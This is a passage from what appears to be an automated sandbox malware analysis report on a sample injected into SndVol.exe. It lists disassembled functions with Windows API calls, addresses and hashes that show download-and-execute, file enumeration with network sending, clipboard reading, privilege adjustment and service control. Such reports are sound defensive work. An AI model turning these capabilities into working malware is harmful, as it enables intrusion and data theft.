__CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
FindClose.KERNEL32(00000000), ref: 004093C1

Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
Part of subcall function 00404E26: FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C

FindClose.KERNEL32(00000000), ref: 004095B9

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
String ID:
API String ID: 2435342581-0
Opcode ID: b872af409f18d4e2bb7bbba0f0478c6e37307eeb8e5c6a27a813a89ef4a7cb37
Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
Opcode Fuzzy Hash: b872af409f18d4e2bb7bbba0f0478c6e37307eeb8e5c6a27a813a89ef4a7cb37
Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98

Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9

Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
_wcschr.LIBVCRUNTIME ref: 00451E4A
_wcschr.LIBVCRUNTIME ref: 00451E58
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB

Strings

sJD, xrefs: 00451DD1, 00451E19, 00451EC1

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: sJD
API String ID: 4212172061-3536923933
Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769

Function 05358509 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 05358524
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 053585EC

Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803

Strings

(eF, xrefs: 0535856D
XPG, xrefs: 05358544
XPG, xrefs: 05358607

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: (eF$XPG$XPG
API String ID: 4113138495-1496965907
Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
Instruction ID: e9dd5fd275ad97ad3b9b33ea445ed4d9f99ff40ea1622d1af0ccbd1d8fb39cbf
Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
Instruction Fuzzy Hash: 962150362042449BC714FB60DC98DEFB7A8AF95360F405D29BD9653090EF74AA4D8A52

Function 053A3109 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,053A3428,?,00000000), ref: 053A31A2
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,053A3428,?,00000000), ref: 053A31CB
GetACP.KERNEL32(?,?,053A3428,?,00000000), ref: 053A31E0

Strings

OCP, xrefs: 053A315D
ACP, xrefs: 053A3127

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction ID: e9c9881654270ab3a2f52d7f1e3db2a7bf4e77721bebd6f7969457d8ecf6f3ae
Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction Fuzzy Hash: 9E216033B04204AADB35AF54D901EBBB7ABFF44B65B568D64E90AD7210E772DE40C390

Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3

Strings

SETTINGS, xrefs: 0041B4AC

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8

Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040966A
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: 4a325c590a34807a26d63d289d9f2ec3f664a0255ff010795f7d94bc543c6bf4
Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
Opcode Fuzzy Hash: 4a325c590a34807a26d63d289d9f2ec3f664a0255ff010795f7d94bc543c6bf4
Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58

Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408811
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
__CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 1f04e96db9afbfa1a7863732a19c0559d59836123212e4eec53f64c460cc1fca
Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
Opcode Fuzzy Hash: 1f04e96db9afbfa1a7863732a19c0559d59836123212e4eec53f64c460cc1fca
Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99

Function 0536861F Relevance: 7.5, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 0536862C
OpenProcessToken.ADVAPI32(00000000), ref: 05368633
LookupPrivilegeValueA.ADVAPI32(00000000,0046C7C8,?), ref: 05368645
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 05368664
GetLastError.KERNEL32 ref: 0536866A

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3534403312-0
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0

Strings

open, xrefs: 00406FB6
C:\Windows\SysWOW64\SndVol.exe, xrefs: 00407007, 0040712F

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\SysWOW64\SndVol.exe$open
API String ID: 2825088817-1291576107
Opcode ID: 97dcc9074c153d6f09495311a7514a554f1da2d909d387662c83696290de7d3d
Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
Opcode Fuzzy Hash: 97dcc9074c153d6f09495311a7514a554f1da2d909d387662c83696290de7d3d
Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B

Function 05367481 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0536861F: GetCurrentProcess.KERNEL32(00000028,?), ref: 0536862C
Part of subcall function 0536861F: OpenProcessToken.ADVAPI32(00000000), ref: 05368633
Part of subcall function 0536861F: LookupPrivilegeValueA.ADVAPI32(00000000,0046C7C8,?), ref: 05368645
Part of subcall function 0536861F: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 05368664
Part of subcall function 0536861F: GetLastError.KERNEL32 ref: 0536866A

ExitWindowsEx.USER32(00000000,00000001), ref: 05367523
LoadLibraryA.KERNEL32(0046C770,0046C760,00000000,00000000,00000000), ref: 05367538
GetProcAddress.KERNEL32(00000000), ref: 0536753F

Strings

!D@, xrefs: 05367D56

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@
API String ID: 1589313981-604454484
Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
Instruction ID: 50165a048092e737e189e6e4e1dd888b7a3f44149752499d8856fcb2f88817c9
Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
Instruction Fuzzy Hash: F421A664744305A7CE14FFB0889DDBF2259EFA1354F809D2D7A4297582EFA4CC068A66

Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7

Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1

Strings

Control Panel\Desktop, xrefs: 0041CA1D, 0041CA50, 0041CAA0
TileWallpaper, xrefs: 0041CAC1
WallpaperStyle, xrefs: 0041CA22, 0041CA55, 0041CAA5

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF

Function 05360474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 05364216: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 05364236
Part of subcall function 05364216: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 05364254
Part of subcall function 05364216: RegCloseKey.ADVAPI32(00000000), ref: 0536425F

Sleep.KERNEL32(00000BB8), ref: 05360528
ExitProcess.KERNEL32 ref: 05360597

Strings

pth_unenc, xrefs: 0536048A, 053604D1, 0536053E

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: pth_unenc
API String ID: 2281282204-4028850238
Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
Instruction ID: 158aca2f796003a12b0aaffb94383f89d1ca41970c6758c7214e04560c57cdef
Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
Instruction Fuzzy Hash: 5321D665F5420067CA18BA754C9EE7F3999AB81620F90951CF806572C9FE689D0087EB

Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0043BC1A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48

Function 0538C7EF Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0538C8E7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0538C8F1
UnhandledExceptionFilter.KERNEL32(?), ref: 0538C8FE

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction ID: d47d79f562cc6b1c08256c57aadc88507c45152b90ea9791e4c5e37a52795e3b
Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction Fuzzy Hash: FD31B2B590131CABCB25EF65D888B9CBBB8BF08750F5041EAE81CA7251E7749F818F54

Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00000000), ref: 00433849
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C

Function 05384504 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,0538418C,00000034,?,?,00472AE0), ref: 05384516
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,0538421F,?,?,?), ref: 0538452C
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,0538421F,?,?,?,0536EF1E), ref: 0538453E

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: 734a89771824bf54d6bae675e23cf1758d9e2267f136732c1fd2db815542049a
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: 07E09231208311FAEF345F21BC08F7B3A6AEB85B6AF600939F211E54E4E29289048518

Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040B711
GetClipboardData.USER32(0000000D), ref: 0040B71D
CloseClipboard.USER32 ref: 0040B725

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD

Function 0536D6AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0536D7A4

Part of subcall function 0536443C: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0536444B
Part of subcall function 0536443C: RegSetValueExA.ADVAPI32(0046611C,0046CBB8,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0536D77E,0046CBB8,0046611C,00000001,00474EE0,00000000), ref: 05364473
Part of subcall function 0536443C: RegCloseKey.ADVAPI32(0046611C,?,?,0536D77E,0046CBB8,0046611C,00000001,00474EE0,00000000,?,0535942A,00000001), ref: 0536447E

Strings

Control Panel\Desktop, xrefs: 0536D6EA, 0536D71D, 0536D76D

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop
API String ID: 4127273184-27424756
Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction ID: 6200e2f2e31a093297a9a4ad217e1585101b292a5397be1825131ea25e0af650
Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction Fuzzy Hash: BE11D322F8021033D91934394D9BF7E2906A383F21F95815FF6123A6CAF8DB1A5003DB

Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94

Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
